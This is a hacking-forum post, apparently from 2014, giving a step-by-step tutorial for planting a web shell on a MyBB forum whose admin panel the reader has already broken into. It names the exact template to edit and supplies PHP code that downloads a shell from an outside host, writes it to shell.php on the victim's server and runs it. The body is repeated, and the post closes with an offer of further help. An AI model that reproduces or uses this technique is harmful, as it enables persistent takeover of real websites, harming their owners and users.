Uploading a shell via the MyBB admin panel. 02-18-2014, 11:07 AM
#1
The Background
So, you've gained access to the forum's admin panel, but now you want to upload a shell.
What you'll need.
A hosted shell, saved as a .txt file.
Access to the target's MyBB control panel.
How to do it.
Login to the Admin control panel. Navigate to Templates & Style > Templates > [THEIR THEME NAME] Templates > Calendar Templates > Calendar
Now, modify the following with the URL of your hosted shell:
Click save and open calender.php (yourvictim.com/calendar.php), then you can navigate to (yourvictim.com/shell.php) and congratulations, you did it!
If you need any help with this, be sure to let me know. :3
So, you've gained access to the forum's admin panel, but now you want to upload a shell.
What you'll need.
A hosted shell, saved as a .txt file.
Access to the target's MyBB control panel.
How to do it.
Login to the Admin control panel. Navigate to Templates & Style > Templates > [THEIR THEME NAME] Templates > Calendar Templates > Calendar
Now, modify the following with the URL of your hosted shell:
PHP Code:
<?php
$shelly= file_get_contents('http://www.yourdomain.com/yourshell.txt');
file_put_contents("shell.php", $shelly);
echo $shelly;
?>Click save and open calender.php (yourvictim.com/calendar.php), then you can navigate to (yourvictim.com/shell.php) and congratulations, you did it!
If you need any help with this, be sure to let me know. :3





![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)









![[Image: jWSyE88.png]](http://i.imgur.com/jWSyE88.png)








![[Image: F4Z9Dqw.png]](https://i.imgur.com/F4Z9Dqw.png)
![[Image: KApAKtG.jpg]](http://i.imgur.com/KApAKtG.jpg)